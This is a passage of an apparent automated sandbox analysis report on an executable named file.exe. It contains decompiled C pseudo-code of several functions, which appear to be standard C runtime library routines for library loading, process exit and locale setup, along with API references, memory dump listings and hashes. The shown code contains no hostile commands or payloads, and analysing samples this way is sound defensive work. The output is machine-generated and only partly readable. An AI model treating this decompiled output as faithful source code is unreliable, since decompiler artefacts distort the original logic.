							_t4 = E009FC916(_t14, __eflags,  *0xa44bd0, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E009FCC76();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E009FC916(_t18, __eflags,  *0xa44bd0, 0);
								} else {
									_t8 = E009FC916(_t18, __eflags,  *0xa44bd0, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E009FCC81(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}












                                                                                                                                                                          0x009fb6ea
                                                                                                                                                                          0x009fb6f1
                                                                                                                                                                          0x009fb704
                                                                                                                                                                          0x009fb70b
                                                                                                                                                                          0x009fb70d
                                                                                                                                                                          0x009fb70e
                                                                                                                                                                          0x009fb711
                                                                                                                                                                          0x009fb72a
                                                                                                                                                                          0x009fb72a
                                                                                                                                                                          0x009fb713
                                                                                                                                                                          0x009fb713
                                                                                                                                                                          0x009fb715
                                                                                                                                                                          0x009fb71f
                                                                                                                                                                          0x009fb726
                                                                                                                                                                          0x009fb728
                                                                                                                                                                          0x009fb72f
                                                                                                                                                                          0x009fb738
                                                                                                                                                                          0x009fb73b
                                                                                                                                                                          0x009fb73c
                                                                                                                                                                          0x009fb73e
                                                                                                                                                                          0x009fb752
                                                                                                                                                                          0x009fb752
                                                                                                                                                                          0x009fb75b
                                                                                                                                                                          0x009fb740
                                                                                                                                                                          0x009fb747
                                                                                                                                                                          0x009fb74d
                                                                                                                                                                          0x009fb74e
                                                                                                                                                                          0x009fb750
                                                                                                                                                                          0x009fb764
                                                                                                                                                                          0x009fb766
                                                                                                                                                                          0x009fb766
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb750
                                                                                                                                                                          0x009fb769
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb728
                                                                                                                                                                          0x009fb715
                                                                                                                                                                          0x009fb771
                                                                                                                                                                          0x009fb77b
                                                                                                                                                                          0x009fb6f3
                                                                                                                                                                          0x009fb6f5
                                                                                                                                                                          0x009fb6f5

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,009FB6E1,009FA58A,009F9357), ref: 009FB6F8
                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009FB706
                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009FB71F
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,009FB6E1,009FA58A,009F9357), ref: 009FB771
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                          • Opcode ID: d4927c325d12ce53af728e76f2d7d69d9425b46dc0874d3a084eecbfbe6abde5
                                                                                                                                                                          • Instruction ID: fdd49459874a47af19e3cfe7ebd8212a411e38cdd668acbadf8ff1506e1b4b71
                                                                                                                                                                          • Opcode Fuzzy Hash: d4927c325d12ce53af728e76f2d7d69d9425b46dc0874d3a084eecbfbe6abde5
                                                                                                                                                                          • Instruction Fuzzy Hash: C70128BA509B1D5EA6203AB5BD8673A2688EBC67B97304229F320850F0EF528C139304
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0BB6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00A0BB6A(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E00A0B091(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E00A0B091(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E009FEB75(GetLastError());
									_t17 =  *((intOrPtr*)(E009FEBAB(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E00A00932(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E009FEB75(GetLastError());
						_t17 =  *((intOrPtr*)(E009FEBAB(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E00A00932(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E00A009B7(_a8);
				return 0;
			}









                                                                                                                                                                          0x00a0bb70
                                                                                                                                                                          0x00a0bb75
                                                                                                                                                                          0x00a0bb89
                                                                                                                                                                          0x00a0bb8c
                                                                                                                                                                          0x00a0bbbe
                                                                                                                                                                          0x00a0bbc6
                                                                                                                                                                          0x00a0bbc8
                                                                                                                                                                          0x00a0bbe1
                                                                                                                                                                          0x00a0bbe4
                                                                                                                                                                          0x00a0bbe7
                                                                                                                                                                          0x00a0bbf5
                                                                                                                                                                          0x00a0bc04
                                                                                                                                                                          0x00a0bc0c
                                                                                                                                                                          0x00a0bc0e
                                                                                                                                                                          0x00a0bc27
                                                                                                                                                                          0x00a0bc2a
                                                                                                                                                                          0x00a0bc2a
                                                                                                                                                                          0x00a0bc10
                                                                                                                                                                          0x00a0bc17
                                                                                                                                                                          0x00a0bc22
                                                                                                                                                                          0x00a0bc22
                                                                                                                                                                          0x00a0bc2c
                                                                                                                                                                          0x00a0bc2d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0bc2d
                                                                                                                                                                          0x00a0bbec
                                                                                                                                                                          0x00a0bbf1
                                                                                                                                                                          0x00a0bbf3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0bbf3
                                                                                                                                                                          0x00a0bbd1
                                                                                                                                                                          0x00a0bbdc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0bbdc
                                                                                                                                                                          0x00a0bb8e
                                                                                                                                                                          0x00a0bb91
                                                                                                                                                                          0x00a0bb94
                                                                                                                                                                          0x00a0bba7
                                                                                                                                                                          0x00a0bbaa
                                                                                                                                                                          0x00a0bbac
                                                                                                                                                                          0x00a0bbae
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0bbae
                                                                                                                                                                          0x00a0bb9a
                                                                                                                                                                          0x00a0bb9f
                                                                                                                                                                          0x00a0bba1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0bba1
                                                                                                                                                                          0x00a0bb7a
                                                                                                                                                                          0x00000000

                                                                                                                                                                          Strings
                                                                                                                                                                          • C:\Users\user\Desktop\file.exe, xrefs: 00A0BB6F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: C:\Users\user\Desktop\file.exe
                                                                                                                                                                          • API String ID: 0-3695852857
                                                                                                                                                                          • Opcode ID: e052ba201828c2b28b31b8b69265f6f7697ea0d3e91cb47c6537eb589ee7a740
                                                                                                                                                                          • Instruction ID: c16b925258a6e57976c53f58ee54ce416fc2bc3db52ecf4d1c92c3bbf61025a7
                                                                                                                                                                          • Opcode Fuzzy Hash: e052ba201828c2b28b31b8b69265f6f7697ea0d3e91cb47c6537eb589ee7a740
                                                                                                                                                                          • Instruction Fuzzy Hash: C721C27161420DBFEB10AF72AE81E7BB7ACEF483647104524F966961D1EB30EC0087B0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009FC782 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E009FC782(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0xa46214 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0xa16338 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E00A03E58(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}













                                                                                                                                                                          0x009fc789
                                                                                                                                                                          0x009fc7fd
                                                                                                                                                                          0x009fc78e
                                                                                                                                                                          0x009fc790
                                                                                                                                                                          0x009fc797
                                                                                                                                                                          0x009fc79b
                                                                                                                                                                          0x009fc7a4
                                                                                                                                                                          0x009fc7b3
                                                                                                                                                                          0x009fc7bc
                                                                                                                                                                          0x009fc7c0
                                                                                                                                                                          0x009fc809
                                                                                                                                                                          0x009fc80b
                                                                                                                                                                          0x009fc80f
                                                                                                                                                                          0x009fc812
                                                                                                                                                                          0x009fc812
                                                                                                                                                                          0x009fc818
                                                                                                                                                                          0x009fc818
                                                                                                                                                                          0x009fc804
                                                                                                                                                                          0x009fc808
                                                                                                                                                                          0x009fc808
                                                                                                                                                                          0x009fc7c2
                                                                                                                                                                          0x009fc7cb
                                                                                                                                                                          0x009fc7f5
                                                                                                                                                                          0x009fc7f8
                                                                                                                                                                          0x009fc7fa
                                                                                                                                                                          0x009fc7fa
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fc7fa
                                                                                                                                                                          0x009fc7cd
                                                                                                                                                                          0x009fc7d8
                                                                                                                                                                          0x009fc7dd
                                                                                                                                                                          0x009fc7e2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fc7e9
                                                                                                                                                                          0x009fc7ef
                                                                                                                                                                          0x009fc7f3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fc7f3
                                                                                                                                                                          0x009fc7a0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fc7a2
                                                                                                                                                                          0x009fc802
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,009FC843,00000000,00000FA0,00A461BC,00000000,?,009FC96E,00000004,InitializeCriticalSectionEx,00A1642C,InitializeCriticalSectionEx,00000000), ref: 009FC812
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                          • API String ID: 3664257935-2084034818
                                                                                                                                                                          • Opcode ID: ff202153cfb619d611cef8bc343828ce8c8795d6ad51465bcec88e623a08fb06
                                                                                                                                                                          • Instruction ID: 7dc9f72596a0d2fb80369b34d1a8d6ea054f3a5b6873097e8a5cb25be6937cce
                                                                                                                                                                          • Opcode Fuzzy Hash: ff202153cfb619d611cef8bc343828ce8c8795d6ad51465bcec88e623a08fb06
                                                                                                                                                                          • Instruction Fuzzy Hash: 70110A76E4022CA7CB21DBACDD407A933989F057B0F258110EB14FB280D774ED018BE1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0173B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 25%
                                                                                                                                                                          			E00A0173B(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0xa1413c(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}






                                                                                                                                                                          0x00a01741
                                                                                                                                                                          0x00a01745
                                                                                                                                                                          0x00a01750
                                                                                                                                                                          0x00a01758
                                                                                                                                                                          0x00a01763
                                                                                                                                                                          0x00a01769
                                                                                                                                                                          0x00a0176d
                                                                                                                                                                          0x00a01774
                                                                                                                                                                          0x00a0177a
                                                                                                                                                                          0x00a0177a
                                                                                                                                                                          0x00a0177c
                                                                                                                                                                          0x00a01781
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a01786
                                                                                                                                                                          0x00a0178d

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00A01730,?,?,00A016F8,?,00000000,?), ref: 00A01750
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A01763
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00A01730,?,?,00A016F8,?,00000000,?), ref: 00A01786
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                          • Opcode ID: b3d5da8e239f85f4fa466a01a237f5c3e33dcdebd4a212563126e6004efdff39
                                                                                                                                                                          • Instruction ID: fccd5f6c3dd9ce977189617b97fca555796b72adbc2a36306b048a98596e7934
                                                                                                                                                                          • Opcode Fuzzy Hash: b3d5da8e239f85f4fa466a01a237f5c3e33dcdebd4a212563126e6004efdff39
                                                                                                                                                                          • Instruction Fuzzy Hash: C3F01C35600219FBDB12EBE5ED49BDEBFB9EF08756F108160A905A21A0CB748E41DA90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A027C2 Relevance: 7.8, APIs: 5, Instructions: 255COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                          			E00A027C2(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				intOrPtr _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int* _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _v772;
				signed int _v784;
				void* __ebp;
				signed int _t156;
				void* _t163;
				signed int _t164;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				signed int _t177;
				signed int _t179;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t186;
				signed int _t202;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t212;
				void* _t213;
				signed int _t220;
				intOrPtr* _t221;
				char* _t228;
				intOrPtr _t232;
				intOrPtr* _t233;
				signed int _t235;
				signed int _t240;
				signed int _t241;
				intOrPtr _t246;
				void* _t247;
				void* _t250;
				signed int _t252;
				signed int _t254;
				signed int _t257;
				signed int* _t258;
				short _t259;
				signed int _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_t244 = __edx;
				_t156 =  *0xa44bac; // 0x96877b9b
				_v8 = _t156 ^ _t260;
				_push(__ebx);
				_t212 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v736 = _t212;
				_v732 = E00A041D0(__ecx, __edx) + 0x278;
				_t163 = E00A01EAD(_t212, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
				_t263 = _t262 + 0x18;
				if(_t163 == 0) {
					L39:
					_t164 = 0;
					__eflags = 0;
					goto L40;
				} else {
					_t10 = _t212 + 2; // 0x6
					_t252 = _t10 << 4;
					_t166 =  &_v272;
					_v712 = _t252;
					_t244 =  *(_t252 + _t246);
					_t220 = _t244;
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t254 = _v712;
						if( *_t166 !=  *_t220) {
							break;
						}
						if( *_t166 == 0) {
							L6:
							_t167 = _v704;
						} else {
							_t259 =  *((intOrPtr*)(_t166 + 2));
							_v706 = _t259;
							_t254 = _v712;
							if(_t259 !=  *((intOrPtr*)(_t220 + 2))) {
								break;
							} else {
								_t166 = _t166 + 4;
								_t220 = _t220 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t167 != 0) {
							_t221 =  &_v272;
							_t244 = _t221 + 2;
							do {
								_t168 =  *_t221;
								_t221 = _t221 + 2;
								__eflags = _t168 - _v704;
							} while (_t168 != _v704);
							_v708 = (_t221 - _t244 >> 1) + 1;
							_t171 = E00A04E1F(4 + ((_t221 - _t244 >> 1) + 1) * 2);
							_v724 = _t171;
							__eflags = _t171;
							if(_t171 == 0) {
								goto L39;
							} else {
								_v720 =  *((intOrPtr*)(_t254 + _t246));
								_v740 =  *(_t246 + 0xa0 + _t212 * 4);
								_v744 =  *(_t246 + 8);
								_t228 =  &_v272;
								_v728 = _t171 + 4;
								_t173 = E00A07440(_t171 + 4, _v708, _t228);
								_t264 = _t263 + 0xc;
								__eflags = _t173;
								if(_t173 != 0) {
									_t174 = _v704;
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									E009FCBFC();
									asm("int3");
									_push(_t260);
									_push(_t228);
									_v784 = _v784 & 0x00000000;
									_t177 = E00A06539(_v772, 0x20001004,  &_v784, 2);
									__eflags = _t177;
									if(_t177 == 0) {
										L49:
										return 0xfde9;
									}
									_t179 = _v12;
									__eflags = _t179;
									if(_t179 == 0) {
										goto L49;
									}
									return _t179;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t254 + _t246)) = _v728;
									if(_v272 != 0x43) {
										L17:
										_t182 = E00A01BCA(_t212, _t246,  &_v700);
										_t244 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L17;
										} else {
											_t244 = _v704;
											_t182 = _t244;
										}
									}
									 *(_t246 + 0xa0 + _t212 * 4) = _t182;
									__eflags = _t212 - 2;
									if(_t212 != 2) {
										__eflags = _t212 - 1;
										if(_t212 != 1) {
											__eflags = _t212 - 5;
											if(_t212 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v716;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v716;
										}
									} else {
										_t258 = _v732;
										 *(_t246 + 8) = _v716;
										_v708 = _t258[8];
										_t240 = _t258[9];
										_v716 = _t240;
										while(1) {
											__eflags =  *(_t246 + 8) -  *(_t258 + _t244 * 8);
											if( *(_t246 + 8) ==  *(_t258 + _t244 * 8)) {
												break;
											}
											_t210 =  *(_t258 + _t244 * 8);
											_t240 =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _v716;
											_t244 = _t244 + 1;
											_t212 = _v736;
											_v708 = _t210;
											_v716 = _t240;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L25:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t202 = E00A0710A(__eflags, _v704, 1, 0xa17c88, 0x7f,  &_v528,  *(_t246 + 8), 1);
												_t264 = _t264 + 0x1c;
												__eflags = _t202;
												if(_t202 == 0) {
													_t241 = _v704;
												} else {
													_t204 = _v704;
													do {
														 *(_t260 + _t204 * 2 - 0x20c) =  *(_t260 + _t204 * 2 - 0x20c) & 0x000001ff;
														_t204 = _t204 + 1;
														__eflags = _t204 - 0x7f;
													} while (_t204 < 0x7f);
													_t206 = E009FA5A0( &_v528,  *0xa44d14, 0xfe);
													_t264 = _t264 + 0xc;
													__eflags = _t206;
													_t241 = 0 | _t206 == 0x00000000;
												}
												_t258[1] = _t241;
												 *_t258 =  *(_t246 + 8);
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L37;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _t240;
										}
										goto L25;
									}
									L37:
									_t183 = _t212 * 0xc;
									_t111 = _t183 + 0xa17d10; // 0x9f7faf
									 *0xa1413c(_t246);
									_t185 =  *((intOrPtr*)( *_t111))();
									_t232 = _v720;
									__eflags = _t185;
									if(_t185 == 0) {
										__eflags = _t232 - 0xa44de8;
										if(_t232 == 0xa44de8) {
											L44:
											_t186 = _v712;
										} else {
											_t257 = _t212 + _t212;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L44;
											} else {
												E00A0447F( *((intOrPtr*)(_t246 + 0x28 + _t257 * 8)));
												E00A0447F( *((intOrPtr*)(_t246 + 0x24 + _t257 * 8)));
												E00A0447F( *(_t246 + 0xa0 + _t212 * 4));
												_t186 = _v712;
												_t235 = _v704;
												 *(_t186 + _t246) = _t235;
												 *(_t246 + 0xa0 + _t212 * 4) = _t235;
											}
										}
										_t233 = _v724;
										 *_t233 = 1;
										_t164 =  *(_t186 + _t246);
										 *((intOrPtr*)(_t246 + 0x28 + (_t212 + _t212) * 8)) = _t233;
									} else {
										 *((intOrPtr*)(_v712 + _t246)) = _t232;
										E00A0447F( *(_t246 + 0xa0 + _t212 * 4));
										 *(_t246 + 0xa0 + _t212 * 4) = _v740;
										E00A0447F(_v724);
										 *(_t246 + 8) = _v744;
										goto L39;
									}
									goto L40;
								}
							}
						} else {
							_t164 = _t244;
							L40:
							_pop(_t247);
							_pop(_t250);
							_pop(_t213);
							return E009F8F7D(_t164, _t213, _v8 ^ _t260, _t244, _t247, _t250);
						}
						goto L51;
					}
					asm("sbb eax, eax");
					_t167 = _t166 | 0x00000001;
					__eflags = _t167;
					goto L8;
				}
				L51:
			}

































































                                                                                                                                                                          0x00a027c2
                                                                                                                                                                          0x00a027cd
                                                                                                                                                                          0x00a027d4
                                                                                                                                                                          0x00a027d7
                                                                                                                                                                          0x00a027d8
                                                                                                                                                                          0x00a027db
                                                                                                                                                                          0x00a027df
                                                                                                                                                                          0x00a027e0
                                                                                                                                                                          0x00a027e3
                                                                                                                                                                          0x00a027f3
                                                                                                                                                                          0x00a02816
                                                                                                                                                                          0x00a0281b
                                                                                                                                                                          0x00a02820
                                                                                                                                                                          0x00a02ad6
                                                                                                                                                                          0x00a02ad6
                                                                                                                                                                          0x00a02ad6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02826
                                                                                                                                                                          0x00a02826
                                                                                                                                                                          0x00a02829
                                                                                                                                                                          0x00a0282c
                                                                                                                                                                          0x00a02832
                                                                                                                                                                          0x00a02838
                                                                                                                                                                          0x00a0283b
                                                                                                                                                                          0x00a0283d
                                                                                                                                                                          0x00a02840
                                                                                                                                                                          0x00a0284a
                                                                                                                                                                          0x00a02850
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02856
                                                                                                                                                                          0x00a0287f
                                                                                                                                                                          0x00a0287f
                                                                                                                                                                          0x00a02858
                                                                                                                                                                          0x00a02858
                                                                                                                                                                          0x00a02860
                                                                                                                                                                          0x00a02867
                                                                                                                                                                          0x00a0286d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0286f
                                                                                                                                                                          0x00a0286f
                                                                                                                                                                          0x00a02872
                                                                                                                                                                          0x00a0287d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0287d
